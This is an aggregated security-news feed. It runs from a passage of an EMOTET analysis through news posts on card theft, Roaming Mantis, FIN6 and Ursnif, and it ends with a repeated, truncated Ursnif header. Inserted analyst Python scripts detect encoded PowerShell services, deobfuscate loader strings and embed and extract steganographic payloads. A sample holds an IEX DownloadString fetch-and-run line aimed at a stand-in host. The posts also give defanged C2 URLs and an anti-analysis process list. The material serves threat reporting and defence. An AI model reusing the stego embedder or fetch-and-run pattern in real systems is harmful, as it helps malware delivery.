Another clear indicator that Themida is present is the PE file import table (IAT). The IAT is partially destroyed and only one function from kernel32.dll can be observed: lstrcpy.

Figure 12: EMOTET IAT (result from Themida packer).

Dig into the details

The Themida packer is, in fact, a constant challenge for malware analysts. The approach we used to inspect the malware was to dump it from memory while it was running. Bear in mind, however, that only small pieces of code are devirtualized by Themida during execution, and that Themida also detects file and registry monitoring tools.

First, the virtual machine needs to be tuned to simulate the infection scenario as realistically as possible. For this, we changed the system language preferences to Spanish (Chile) and adjusted some values in the Windows Registry, since the malware reads them to detect analysis environments and evade inspection.


Figure 13: Changes performed to the SystemBiosDate and VideoBiosVersion values under HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System.

But nothing is perfect. The malware constantly checks the processes running in the system and terminates if any of the following are found (this is an evasion technique used by the Themida packer and available here). This is one of the many features of this modern packer.

  indicators = [
      "OLLYDBG",
      "GBDYLLO",
      "pediy06",
      "FilemonClass",
      "File Monitor - Sysinternals: www.sysinternals.com",
      "PROCMON_WINDOW_CLASS",
      "Process Monitor - Sysinternals: www.sysinternals.com",
      "RegmonClass",
      "Registry Monitor - Sysinternals: www.sysinternals.com",
      "18467-41",
  ]

Back to EMOTET: after dumping it from memory, we observed some imported DLLs and the malware's strings.

Only a few blocks of EMOTET can be analysed, because Themida runs on a virtual machine environment: malware functions are devirtualized in real time, so the IAT cannot be fixed properly either.


Figure 14: DLLs imported by EMOTET and anti-VM and anti-dbg techniques detected in this specific memory dump.

After dumping it from memory, note that only some DLLs are rebuilt; we suspect the others remain hidden. Both anti-VM and anti-debug techniques were again detected in the dumped sample. This is nothing new!

However, some information can be extracted from the binary. When executed on a victim's computer, initial information is sent to the C2 server (a sort of "EHLO" message with some arguments).

Figure 15: EMOTET  C2 server URL.

Information sent includes:

  • Date/hour of infection
  • Victim IP Address
  • Windows OS version
  • Antivirus name

Figure 16 presents a query performed by malware in order to identify the antivirus name running in the infected machine. Winmgmts is a WMI service within the SVCHOST process running under the “LocalSystem” account.


Figure 16: EMOTET collects antivirus product name via WMI query.

The file "up.php" writes all the entries to another file called "tictic.txt". Every time a victim is infected, an EHLO request is sent to "up.php", which writes the infection data highlighted above into this file.


Figure 17: EMOTET C2 files available in an opendir.

Using this file, available on the opendir C2, it was possible to build the GeoMap of Threats presented at the beginning of the article.

After processing the data we found that 1089 users were infected during this campaign. As pointed out, Chile, USA, Germany and France were the countries with the most hits. From a total of 1089, 175 victims were impacted in Chile, 162 in USA, 137 in Germany and 132 in France.

But it is important to answer this question: what kind of data is collected by this banking trojan? Banking credentials, of course.

EMOTET drops a sqlite3.dll during execution in order to read data from the SQLite databases of the popular web browsers installed on the machine.


Figure 18: EMOTET collects data from main popular web-browsers.

During static analysis it was also possible to observe the targeted banks and financial institutions involved in this attack, namely:

  • BBVAnet
  • Santander
  • CorpBanca
  • Banco Falabella
  • BCI
  • Banco Security
  • Banco Estado
  • Banco de Chile

Figure 19: Banks and financial institutions involved in this attack.

Figure 20 (below) shows one of the last administration panels used by EMOTET in its recent infections.


Figure 20: Administration panel used in recent variants by EMOTET.

Another interesting aspect is the following string, observed in past EMOTET infections and hardcoded inside many malware samples.

  C:\Projects\Pe indetectavel D2007\comps\TMSv7\AdvEdDD.pas

This is a drag'n'drop interface support file for Delphi 5, 6, 7, 2005, 2006 and C++Builder. We could not retrieve any more information about this library in the malware.

During this analysis we detected that the malware performs several connections to "www.bing.com", perhaps to validate that a connection to the Internet is available.


Figure 21: Internet connection is validated during EMOTET execution.

Curiously, after several memory dumps we noticed that some interesting strings change in memory. At one specific moment we captured a block of hex-encoded strings interleaved with readable fragments of bank and payment-service names (BICE, BBVA, ITA, SANTA, CORP, ESTADO, CHILE, BCI, SECU, FALA, WebPay, ServiPag, SCOTI).


These seem to be encrypted strings with specific information about banking systems (perhaps endpoints; we don't know).

One way to fully understand the malware would be to devirtualize the entire code. As shown, the Themida packer makes malware analysis harder, and that was a big challenge during this investigation.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis published by Pedro Tavares.

About the author Pedro Tavares 

Pedro Tavares is a professional in the field of information security, working as an Ethical Hacker, Malware Analyst and Security Evangelist. He is also a founding member and Pentester at CSIRT.UBI and founder of the computer security blog seguranca-informatica.pt.

Pierluigi Paganini

(SecurityAffairs – EMOTET malware, hacking)

The post [SI-LAB] EMOTET spread in Chile impacted hundreds of users and targeted financial and banking services appeared first on Security Affairs.



Security Affairs

Cyberattacks becoming more costly and focused, UK government figures show

By Jon Abbott, CEO at ThreatAware. While fewer businesses are suffering cyberattacks or breaches, attacks are becoming more costly and targeted, according to the latest government figures released today. The

The post Cyberattacks becoming more costly and focused, UK government figures show appeared first on The Cyber Security Place.

E Hacking News – Latest Hacker News and IT Security News: UK : Social Media Executives To Be Held Accountable For Destructive Content!



Reports have it that, according to a recent proposal by the UK authorities, social media executives shall be held personally liable for the harmful content on their platforms.
The freshly published paper in which the details were laid out is simply a tactic to restrict the spread of violent and detrimental content related to suicide and cyberbullying.
Disinformation is another theme alluded to, along with the rising need for companies to hold their ground against terrorist, child-abuse and sexually abusive content.
The regulations and guidelines in the aforementioned paper also mention the requirement for an individual regulator to enforce the rules.
It is high time that online companies took responsibility for the content their platforms display, in an attempt to restore trust in technology within society.
File hosting sites, chat forums, messaging services, search engines and social media platforms alike will fall under the aforementioned measures.
The policies also provide strong punishments for companies that do not adhere to them, including substantial fines and blocking of access.
This is a significant action with the potential to bring change, although the implementation may not be as simple as it sounds.
The above-mentioned set of guidelines would provide a stable code of conduct for everyone on social media which, if complied with, will lead to safer platforms.
But the implementation is still in question, along with other questions such as whether the regulatory approach will be different for smaller companies.
Social media regulation and the improvements it requires have been on everyone's mind of late because of the mosque shooting in New Zealand.
The shooting was live-streamed on Facebook, and other social media sites such as Instagram and YouTube rushed to block and delete copies of the video, which instantly went viral.
Legislation not very different from the UK proposal discussed above was passed in Australia, meaning to hold executives responsible for whatever is posted on their platforms.




2 students arrested for disrupting school WiFi to skip exam

By Waqas

Two 14-year old 9th graders have been arrested by the police for disrupting the WiFi system of their school, Secaucus High School, Hudson County in March. According to reports, the students used an especially designed app to make the connection so overloaded with traffic that it became difficult for the teachers to upload test results […]

This is a post from HackRead.com Read the original post: 2 students arrested for disrupting school WiFi to skip exam

Gulf countries came under hackers’ spotlight in 2018, with more than 130 000 payment cards compromised

Bahrain, 08.04.2019 – Group-IB, an international company that specializes in preventing cyberattacks, and NGN International, a global system integrator, analyzed the cybersecurity landscape in the Gulf countries in 2018.

Group-IB's Threat Intelligence team identified compromised credentials of 7 306 users from the Gulf countries in 2018 and detected a total of 138 978 compromised cards issued by the Gulf countries' banks.

Number of compromised cards ramps up in GCC

In 2018, Gulf countries including Bahrain, Kuwait, Oman, Qatar, Saudi Arabia and the United Arab Emirates (UAE) came under the spotlight of cybercriminals increasingly often. Group-IB Threat Intelligence experts detected a total of 138 978 compromised cards issued by the Gulf countries’ banks. This data comes not only from the analysis of underground forums and phishing websites, but also from the analysis of cybercriminals’ infrastructure (including but not limited to C&Cs) and malware disassembling.

“The stolen payment cards data is often put up for sale on underground forums or used in further fraudulent activities. Group-IB Threat Intelligence team continuously analyses compromised cards data all over the world. According to Group-IB’s annual Hi-Tech Crime Trends 2018 report, on average, from June 2017 to August 2018, the details of 1.8 million payment cards were uploaded to card shops monthly,” – comments Alexander Kalinin, head of Group-IB’s Computer Emergency Response Team (CERT-GIB).

Map of Middle-Eastern Countries.

Yaqoob AlAwadhi, CEO of NGN International, stated that from 2017 to 2018 cybercrimes aimed at financial theft increased significantly, with cybercriminals largely exploiting software vulnerabilities through phishing mailings and hacked legitimate resources.

“The attacks lately have evolved a lot as attackers are beginning to use artificial intelligence and machine learning to bypass the defense, attempting what is known as ‘low-and-slow’ attacks,” explained Mr. AlAwadhi. “What is important is that successful struggle with such cyber-attacks is possible. It is extremely important to react to them in time and correctly, as well as to build a competent comprehensive protection system in advance,” he added.

With the advent of IoT technologies, big data and machine learning, attack tools become more advanced and encompass several information systems and resources. “Attacks on state information systems and resources, and resources of individual enterprises and industries, can lead to negative consequences for the economy of the country, while affecting the health and lives of people,” he stressed.

“Hence, the task of preventing information security incidents for critical information infrastructures should be addressed at the legislative level. NGN International offers customers a comprehensive approach to protecting information infrastructure: from protecting important critical information infrastructure objects to round-the-clock monitoring of security incidents based on Group-IB solutions,” stated Mr. AlAwadhi.

Compromised credentials

Group-IB Threat Intelligence team also identified leaked credentials of 7,306 users from the Gulf countries in 2018, among which the company experts discovered 1 227 compromised credentials from government resources in GCC. Upon identification of this information, CERT-GIB reached out to region’s government CERTs to inform about the threat.

“It is important to highlight that credentials were not leaked from government systems, which are most likely safe and secure, but from the individuals who used them for personal purposes. However, with the credentials from government websites, hackers can not only obtain classified information, but also infiltrate government networks and maintain presence while remaining unnoticed for long periods,” – says Alexander Kalinin. 

According to Group-IB experts, cybercriminals might have used special spyware to steal user credentials — formgrabbers, keyloggers, such as Pony Formgrabber and AZORult. According to Group-IB data, the two Trojans mentioned above were amongst the most popular for credentials stealing in 2018 in GCC.

The regularly updated Group-IB Threat Intelligence system provides actionable information about data leaks, compromised accounts, malware, infected IPs and existing vulnerabilities across the world. Group-IB collects and analyses large amounts of unique and proprietary information to deliver tailored, trusted and actionable intelligence that predicts risks while preventing and mitigating targeted attacks.

About Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

About NGN International

NGN International is a full-fledged systems integrator and IT consultancy established in 2015 in Bahrain as a part of NGN, a global system integrator operating in MENA since 2005.

Pierluigi Paganini

(SecurityAffairs – Gulf countries, hacking)

The post Gulf countries came under hackers’ spotlight in 2018, with more than 130 000 payment cards compromised appeared first on Security Affairs.




Security Affairs

Recent Roaming Mantis campaign hit hundreds of users worldwide

Kaspersky Lab reported that hundreds of users have been targeted with malware over the past month as part of a recent Roaming Mantis campaign.

Security experts at Kaspersky Lab reported that hundreds of users have been targeted with malware over the past month as part of a new campaign associated with Roaming Mantis gang.

Roaming Mantis surfaced in March 2018 when hacked routers in Japan redirecting users to compromised websites. Investigation by Kaspersky Lab indicates that the attack was targeting users in Asia with fake websites customized for English, Korean, Simplified Chinese and Japanese. Most impacted users were in Bangladesh, Japan, and South Korea.

The latest wave of attacks aimed at spreading phishing links via SMS messages (SMiShing); most of the victims were users in Russia, Japan, India, Bangladesh, Kazakhstan, Azerbaijan, Iran, and Vietnam.

Researchers detected Roaming Mantis-related malware over 6,800 times for more than 950 unique users in the period between February 25 and March 20, 2019.


Experts believe that the recent campaign has a much bigger scale compared with previous ones and the numbers reported in the analysis reflect only a small part of this campaign.

Attackers used a new phishing method based on malicious mobile configurations, along with the previously observed DNS manipulation technique.

Unlike previous attacks, this time Roaming Mantis attackers used a new landing page to target iOS devices in the attempt to trick victims into installing a malicious iOS mobile configuration.

The configuration launches the phishing site in a web browser and gathers information from the target’s device.

Android users have been infected with malware that Trend Micro tracks as XLoader and McAfee tracks as MoqHao.

“Our key finding is that the actor continues to seek ways to compromise iOS devices and has even built a new landing page for iOS users. When an iPhone user visits this landing page, she sees pop-up messages guiding her to the malicious iOS mobile config installation” reads the analysis published by Kaspersky.

“After installation of this mobile config, the phishing site automatically opens in a web browser and collected information from the device is sent to the attacker’s server. This information includes DEVICE_PRODUCT, DEVICE_VERSION, UDID, ICCID, IMEI and MEID.”

“On the Android front, our telemetry data shows a new wave of malicious APK files which we detect as ‘Trojan-Dropper.AndroidOS.Wroba.g’.”

In late February 2019, experts detected a URL query of a malicious DNS changer that attackers used to compromise router DNS settings. The attack works if the following conditions are met:

  • no authentication is required for the router’s control panel from the local network;
  • the device has an admin session open for the router panel;
  • a simple or default username and password, such as admin:admin, are used for the router.

Experts at Kaspersky discovered that several hundred routers have been compromised in this way and that all pointed to the rogue DNS IPs.

“We have seen increased distribution of sagawa.apk Type A since late February 2019. This wave is characterized by a new attack method of phishing with malicious mobile config, although the previously observed DNS manipulation is also still actively used.”

Kaspersky concludes: “We find the use of malicious mobile config especially alarming as this may cause serious problems for the users.”

Pierluigi Paganini

(SecurityAffairs – Roaming Mantis, hacking)

The post Recent Roaming Mantis campaign hit hundreds of users worldwide appeared first on Security Affairs.


E Hacking News – Latest Hacker News and IT Security News: “BasBanke”: Android Malware That Hacks Financial/Personal Data!

Introducing “BasBanke”, another entry in the already long list of Android malware, this one targeting Brazilians’ financial and personal details.

Credit/debit card numbers, other financial data, and personal data of Brazilians are what the cybercriminals are hunting for via the malware.

This malware has been active through malicious applications since the 2018 Brazilian elections, with over 10,000 downloads from the Google Play store.

Through social media platforms like Facebook and WhatsApp, users were tricked into downloading the malware.


Later on, capabilities like keystroke logging, SMS interception and screen recording were also observed.

The advertising campaign’s URL pointed to the legitimate Google Play Store.

A malicious app going by the name of “CleanDroid” is another of the malicious apps that was advertised on Facebook along with a download link.

The aforementioned application pretends to help in protecting the victim’s device from viruses and optimizing memory space.

The Google Play store hosts many such illegitimate Android apps, which pretend to be QR readers or travel guides while tricking the victim.

A similar malicious campaign was discovered by a leading anti-virus organization, but with relatively lower distribution rates.

On the distribution front, social media played a vital role too.

Harvesting metadata such as IMEI, telephone numbers and device names, along with other personal information, is the main agenda.

Once collected, this data is sent to the attackers via a C2 server.

Platforms like Netflix, YouTube and Spotify immediately stepped up their security measures after perceiving that banking details were being hunted.


FIN6 group starts using LockerGoga and Ryuk Ransomware

Security experts at FireEye observed the financially motivated group FIN6 adding the LockerGoga and Ryuk ransomware to its arsenal.

According to cybersecurity experts at FireEye, the FIN6 cybercrime group is diversifying its activities and added LockerGoga and Ryuk ransomware to its arsenal.

Previous attacks conducted by the FIN6 group aimed at compromising point-of-sale (PoS) systems, but recent operations conducted by the group expanded its targets and hit entities in the engineering industry.

“Recently, FireEye Managed Defense detected and responded to a FIN6 intrusion at a customer within the engineering industry, which seemed out of character due to FIN6’s historical targeting of payment card data.” reads the analysis published by FireEye.

“FIN6 has expanded their criminal enterprise to deploy ransomware in an attempt to further monetize their access to compromised entities.

This blog post details the latest FIN6 tactics, techniques, and procedures (TTPs), including ties to the use of LockerGoga and Ryuk ransomware families.”

Recent attacks involving both Ryuk and LockerGoga were attributed to the FIN6 crime gang or to some of its members who appear to have operated independently.

Experts have traced these intrusions back to July 2018; they have caused losses of tens of millions of dollars to the victims.

The recent wave of attacks attributed to FIN6 leverages stolen credentials, Cobalt Strike, Metasploit, and other publicly available tools in the reconnaissance phase.

Attackers used Windows’ Remote Desktop Protocol (RDP) for lateral movement and the following techniques to carry out the attacks:

  • Attackers used PowerShell to execute an encoded command that adds Cobalt Strike to the compromised system and executes a chain of payloads until the final one is retrieved.
  • Attackers created randomly named Windows services to execute an encoded PowerShell command that included a reverse HTTP shellcode payload stored in a byte array, as in the first technique.

“The Metasploit reverse HTTP payload was configured to communicate with the command and control (C2) IP address 176.126.85[.]207 with a randomly named resource such as “/ilX9zObq6LleAF8BBdsdHwRjapd8_1Tl4Y-9Rc6hMbPXHPgVTWTtb0xfb7BpIyC1Lia31F5gCN_btvkad7aR2JF5ySRLZmTtY” over TCP port 443. This C2 URL contained shellcode that would make an HTTPS request for an additional download.” continues the analysis.

“To achieve privilege escalation within the environment, FIN6 utilized a named pipe impersonation technique included within the Metasploit framework that allows for SYSTEM-level privilege escalation.”

Attackers leveraged AdFind to query Active Directory and move laterally; they used 7-Zip to compress the data before sending it to the C2 server.
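The randomly named services running encoded PowerShell with a byte-array shellcode payload, described in the two techniques above, are what a defender would hunt for in service-installation events. The following Python script is an added example, not part of the FireEye report or the original post: it parses constructed, flattened Windows event 7045 records (the one-line format, the service names and the stage script are my own), decodes any -EncodedCommand argument and flags the indicators described above.

```python
import base64
import re

# Flattened "service installed" (System log event 7045) records. The one-line
# format and all sample values are constructed for this example.
EVENT_RE = re.compile(r"^EventID=(\d+)\s+ServiceName=(\S+)\s+ImagePath=(.*)$")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...).
ENC_FLAG_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Eight or more comma-separated hex bytes: shellcode kept in a [Byte[]] array.
BYTE_ARRAY_RE = re.compile(r"0x[0-9a-f]{2}(?:\s*,\s*0x[0-9a-f]{2}){7,}", re.I)


def encode_command(script: str) -> str:
    """Encode a script the way PowerShell expects it: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(image_path: str):
    """Return the plaintext of an -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_FLAG_RE.search(image_path)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def looks_random(service_name: str) -> bool:
    """Heuristic (my own, not FireEye's) for randomly named services: a short
    name mixing letters and digits, which legitimate services rarely use."""
    return (len(service_name) <= 12
            and any(c.isdigit() for c in service_name)
            and any(c.isalpha() for c in service_name))


def analyse_event(line: str) -> list:
    """Return the indicator names found in one flattened 7045 record ([] if benign)."""
    m = EVENT_RE.match(line)
    if not m or m.group(1) != "7045":
        return []
    service_name, image_path = m.group(2), m.group(3)
    findings = []
    if looks_random(service_name):
        findings.append("random-service-name")
    lowered = image_path.lower()
    if "powershell" in lowered and ("-w hidden" in lowered or "-nop" in lowered):
        findings.append("hidden-powershell-launch")
    decoded = decode_encoded_command(image_path)
    if decoded is None:
        return findings
    findings.append("encoded-command")
    if BYTE_ARRAY_RE.search(decoded):
        findings.append("shellcode-byte-array")
    if re.search(r"\b(?:iex|invoke-expression)\b", decoded, re.I):
        findings.append("invoke-expression")
    if re.search(r"downloadstring|net\.webclient|invoke-webrequest", decoded, re.I):
        findings.append("web-download")
    return findings


def scan(lines) -> dict:
    """Map each flagged service name to its indicators; benign records are dropped."""
    report = {}
    for line in lines:
        findings = analyse_event(line)
        if findings:
            report[EVENT_RE.match(line).group(2)] = findings
    return report


# Constructed stage: a harmless stand-in for the byte-array shellcode loader.
STAGE = ("[Byte[]]$b = 0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09; "
         "$c = New-Object Net.WebClient; IEX $c.DownloadString('http://c2.invalid/stage')")
SAMPLE_EVENTS = [
    "EventID=7045 ServiceName=Spooler ImagePath=C:\\Windows\\System32\\spoolsv.exe",
    "EventID=7045 ServiceName=aK3xQ9 ImagePath=%COMSPEC% /b /c start /b /min "
    "powershell.exe -nop -w hidden -encodedcommand " + encode_command(STAGE),
]

if __name__ == "__main__":
    for name, findings in scan(SAMPLE_EVENTS).items():
        print(name, ", ".join(findings))
```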

“Criminal operations and relationships are highly adaptable, so we commonly encounter such attribution challenges in regards to criminal activity.” concludes FireEye. “Given that these intrusions have been sustained for almost a year, we expect that continued research into further intrusion attempts may enable us to more fully answer these questions regarding FIN6’s current status,”

Further technical details, including Indicators of Compromise, are reported in the analysis published by FireEye.

Pierluigi Paganini

(SecurityAffairs – FIN6, hacking)

The post FIN6 group starts using LockerGoga and Ryuk Ransomware appeared first on Security Affairs.


How to identify & protect yourself from online dating scams

By Waqas

The Internet is an addictive world due to its unlimited and lucrative opportunities for people from almost every facet of life. Some use the Internet to make money, some use it to keep in touch with their loved ones, and some to find love – and then there are those who use it for nefarious […]

This is a post from HackRead.com Read the original post: How to identify & protect yourself from online dating scams

Ursnif: The Latest Evolution of the Most Popular Banking Malware

ZLab Yoroi-Cybaze dissected another attack wave of the Ursnif Trojan, aka Gozi ISFB, an offspring of the original Gozi, whose source code was leaked in 2014.

Introduction

A few days ago, the researchers of ZLab Yoroi-Cybaze dissected another attack wave of the infamous Ursnif malware, also known as Gozi ISFB, an offspring of the original Gozi, whose source code was leaked in 2014. Ursnif/Gozi has been active for over a decade and was one of the most active malware families listed in 2017 and 2018. Today it constantly reaches organizations across Italy, presenting itself in several ways, for instance as a malicious document delivered through email.

The malware has evolved over time and has added functionality: apart from collecting banking credentials, it is also able to collect keystrokes, cryptocurrencies, screenshots and webmail, integrating spyware features with its banking Trojan features.

During their investigations, researchers of ZLab Yoroi-Cybaze intercepted a new variant of this malware delivered through a malspam campaign aimed at Italian companies. This latest Ursnif variant shows the same modus operandi: a malicious document embedding a highly obfuscated VBA macro that acts as the first-stage dropper.

The Ursnif Threat Evolution

According to Microsoft, since its appearance in 2009 Ursnif has shown incredible capabilities to steal users’ credentials, including credentials for local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites, while remaining as stealthy as possible. It uses many advanced tricks to evade several sandbox environments and today is the most popular malware spreading in the wild. ZLab researchers have studied many samples in the past to profile the techniques used by the malware and to track its evolution and sophistication over time.

Table 1: Ursnif techniques evolution

The first analyzed sample dates back to January 2018. That Ursnif variant was delivered through a macro document and consisted of a few obfuscated stages and a process hollowing injection technique to execute its payload. A few months later, in June 2018, we found evidence that Ursnif was delivered through the Necurs botnet. The latter is one of the most famous botnets known nowadays, and it has been used to deliver this Ursnif variant. The hidden link between Necurs and Ursnif was discovered by ZLab researchers, as explained in this link. In December 2018, a first shift was the implementation of many dropper stages in order to hide the final payload; moreover, to execute its payload the malware did not perform a classical process injection as in the previous samples but an APC injection, a payload injection trick not previously seen in Ursnif.

The sample spread in February 2019 uses two new features: the first is several obfuscated PowerShell stages to evade AVs and reduce detection; the second is the use of a steganography technique, which hides code inside a legitimate image by manipulating specific bits. Another piece of code then decrypts and executes the malicious code on the victim machine.

In March 2019 another weaponized variant of Ursnif was detected: in this case, to spread the malicious software, a Google Drive document combined with an obfuscated VBA script is used over steganography. The last sample shown in the previous table is similar to February’s sample but includes another interesting feature: a first VBS stage is encrypted using the Vigenère cipher, which hides its malicious code and evades many sandbox environments. We are observing a continuous evolution, with several features added in a few months; this indicates that the malware is still in development and, observing also the fragmentation of features among variants, lets us think with high confidence that various forks of the same codebase are spreading in the wild.

Technical Analysis

Sha256: 34669dde1e33ec96147540433f60e90056d38df1e3bb952fdc600e979d74f690
Threat: Ursnif dropper
Short description: Excel with macro
ssdeep: 1536:hn1DN3aMePUKccCEW8yjJTdrBX/3t4k3hOdsylKlgryzc4bNhZFGzE+cL4LgldAK:hn1DN3aM+UKc

Table 2: information about Ursnif dropper

The most widespread infection vector observed was macro-enabled Office documents, and this variant uses the same technique. The malicious document looks like an invoice that requires enabling macros in order to properly view its contents.

Figure 1: excel document requiring macro enabling

The whole infection chain begins when the macro is enabled. This Ursnif variant presents a macro protection technique that is not present in previous variants, intended to make analysis harder by preventing manipulation and extraction. After extracting the OLE object inside the document we are able to see the content of the macros and their associated names, as shown in the following figure:

Figure 2: macros isolation

Now it is possible to isolate an interesting macro in order to analyze it in detail. It contains a piece of VBA code, which was extracted.

Figure 3: VB macro source code

Unlike in past waves, the malware author added a “VigenereDo” function to decrypt and reconstruct the initial infection step, using an algorithm based on the Vigenère cipher, a classical polyalphabetic cipher.

The resulting command text is obtained by combining the obfuscated strings defined in the “jeneric” function with other strings (not visible in the figure); after some further manipulation it is possible to spot the whole script that will be executed. When the user enables macros, the “wmic.exe” process runs the following code through the “wmic ‘PRocesS’   “Call” ‘CREATe’” command.

Figure 4: the powershell script (crypted)

So, at this point, several PowerShell deobfuscation steps occur. First of all, every occurrence of “${1F}” in the PowerShell string is replaced with the content of the “$1F” variable, which is the “,” (comma) character. After these replacements, the script is run through the “iex” primitive, invoked first by “.($psHomE[4]+$pshOMe[34]+’X’)” and then by “( “. ( `$ShELLid[1]+`$shelLID[13]+’X’)”. The complete deobfuscated script is the following.

Figure 5:  the first powershell script (decrypted)
Figure 6: image with malicious embedded powershell script
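The two deobfuscation steps just described (placeholder expansion and the indexed-character trick that spells “iex” out of $PSHOME and $ShellId) can be automated. The following Python script is an added example, not code from the Yoroi analysis: the $PSHOME and $ShellId values are those of a default 64-bit Windows PowerShell 5.1 install, and the obfuscated input is a constructed stand-in for the real first stage.

```python
import re

# Assumed values of the two PowerShell automatic variables the loader indexes
# into (default 64-bit Windows PowerShell 5.1); other installs may differ.
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"
SHELLID = "Microsoft.PowerShell"
VARIABLES = {"pshome": PSHOME, "shellid": SHELLID}

INDEX_RE = re.compile(r"`?\$(\w+)\[(\d+)\]")            # $psHomE[4] or `$ShELLid[1]
LITERAL_RE = re.compile(r"'([^']*)'")                    # 'X'
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")       # $1F = ','
# .( ... ) or &( ... ) whose argument contains at least one indexed variable
INVOKE_RE = re.compile(r"([.&])\s*\(\s*([^()]*\[\d+\][^()]*?)\s*\)")


def resolve_concat(expr: str) -> str:
    """Evaluate a '+' chain of single-character indexes and literals into the
    string PowerShell would build, e.g. $psHomE[4]+$pshOMe[34]+'X' -> 'ieX'.
    Literals containing '+' are not supported (none appear in this stage)."""
    parts = []
    for term in expr.split("+"):
        term = term.strip()
        m = INDEX_RE.fullmatch(term)
        if m:
            parts.append(VARIABLES[m.group(1).lower()][int(m.group(2))])
            continue
        m = LITERAL_RE.fullmatch(term)
        if m:
            parts.append(m.group(1))
            continue
        raise ValueError("unsupported term: " + term)
    return "".join(parts)


def deobfuscate(script: str) -> str:
    """Step 1: expand every ${name} placeholder with the literal assigned to $name.
    Step 2: replace each .( ... ) / &( ... ) index expression with the command
    it evaluates to, so the invocation reads as plain text."""
    for name, value in ASSIGN_RE.findall(script):
        script = script.replace("${%s}" % name, value)
    return INVOKE_RE.sub(lambda m: m.group(1) + " " + resolve_concat(m.group(2)), script)


# Constructed stand-in for the obfuscated first stage (not the real script).
OBFUSCATED = ("$1F = ','; .($psHomE[4]+$pshOMe[34]+'X') "
              "(\"Set-Variable stage (1${1F}2${1F}3); "
              "& (`$ShELLid[1]+`$shelLID[13]+'X') 'Get-Date'\")")

if __name__ == "__main__":
    print(deobfuscate(OBFUSCATED))
```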

First of all, the malware checks the current time zone to verify whether it is set to +01:00. If so, it downloads the next stage from “hxxps://i[.]imgur[.]com/TVkWKQa[.]png”. As in other recent attacks, the downloaded image hides another PowerShell stage, leveraging steganography techniques.

The malware code iterates over each pixel of the image and, through several binary operations, grabs the two least significant bits of every byte of the picture, concatenating them with the other LSBs to produce a complete PowerShell script.
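The two-LSB extraction just described, as an added analyst-side example that is not part of the Yoroi analysis: the carrier is a constructed greyscale raster standing in for the PNG’s decoded pixel data, the hidden script is a harmless stand-in, and the 4-byte length prefix is my own framing choice, since the page does not describe how the loader delimits the hidden script.

```python
import struct
from itertools import islice

# Constructed 64x64 8-bit greyscale raster (4096 bytes) standing in for the
# decoded pixel data of the image; the real PNG bytes are not reproduced here.
CARRIER = bytes((i * 7) % 256 for i in range(64 * 64))
# Constructed stand-in for the hidden second-stage script.
PAYLOAD = b"Write-Output 'second stage (constructed sample)'"


def embed_2lsb(carrier: bytes, payload: bytes) -> bytes:
    """Hide payload in the two low bits of each carrier byte (four carrier bytes
    per payload byte) behind a 4-byte big-endian length prefix. Used here only
    to build the sample the extractor is run against."""
    framed = struct.pack(">I", len(payload)) + payload
    if len(framed) * 4 > len(carrier):
        raise ValueError("carrier too small for payload")
    out = bytearray(carrier)
    for i, byte in enumerate(framed):
        for j in range(4):                          # most significant pair first
            pair = (byte >> (6 - 2 * j)) & 0b11
            out[i * 4 + j] = (out[i * 4 + j] & 0xFC) | pair
    return bytes(out)


def two_lsb_stream(carrier: bytes):
    """Yield one byte for every four carrier bytes, rebuilt from their two LSBs."""
    acc, nbits = 0, 0
    for b in carrier:
        acc = (acc << 2) | (b & 0b11)
        nbits += 2
        if nbits == 8:
            yield acc
            acc, nbits = 0, 0


def extract_2lsb(carrier: bytes):
    """Recover the hidden bytes, or None when the length prefix does not fit in
    the carrier, which is what the LSB noise of an unmodified image yields."""
    stream = two_lsb_stream(carrier)
    header = bytes(islice(stream, 4))
    if len(header) < 4:
        return None
    length = struct.unpack(">I", header)[0]
    if (4 + length) * 4 > len(carrier):
        return None
    return bytes(islice(stream, length))


STEGO = embed_2lsb(CARRIER, PAYLOAD)

if __name__ == "__main__":
    print(extract_2lsb(STEGO))
    print(extract_2lsb(CARRIER))
```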

Figure 7: second powershell script extracted from the steganographic image

Et voilà, another URL is found, but before downloading the next stage from it, the malware performs a further check, evaluating the value returned by “CurrentCulture”.

Figure 8: CurrentCulture verification in PowerShell

If the check passes, once again through the “IEX” primitive it tries to download another component, named “ose000000.exe”, from “hxxps://nuovalo[.]site/RGI82B3.-tmp-tmp”, saving it into the “%TEMP%” folder. The following table shows information about the sample.

Sha256: 0f2245eec921949d9a1d8e13cab747a7fbb137aaee3b9ddacee0681c8b2e4fa8
Threat: Ursnif
Short description: Final payload of Ursnif banking malware
ssdeep: 6144:LCLAh6EzJYJtmavTXyulcNcyuo8PGJMewXo79y:L54EzetmCb3cNc3o0PR4

Table 3: information about Ursnif final payload

Conclusion

This latest Ursnif wave keeps showing a complex infection process. The starting point of the entire chain was the usual Visual Basic macro, this time protecting its code with a Vigenère cipher and responsible for decrypting the additional PowerShell stage, which is launched by abusing Windows Management Instrumentation (WMI) functionality to decouple it from the original infection tree. The chain is then completed by exploiting steganography techniques to bypass network detection and by several environmental checks that ensure the malware is running on the expected machines, confirming the highly evasive trend of this aggressive malware threat.

Further technical details, including Indicators of Compromise, are reported in the analysis published on the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – Ursnif Trojan, cybercrime)

The post Ursnif: The Latest Evolution of the Most Popular Banking Malware appeared first on Security Affairs.

Security Affairs: Ursnif: The Latest Evolution of the Most Popular Banking Malware

ZLab Yoroi-Cybaze dissected another attack wave of Ursnif Trojan, aka Gozi ISFB, an offspring of the original Gozi which source code was leaked in 2014. ZLab Yoroi-Cybaze dissected another attack wave of Ursnif Trojan, aka Gozi ISFB, an offspring of the original Gozi which source code was leaked in 2014.

Introduction

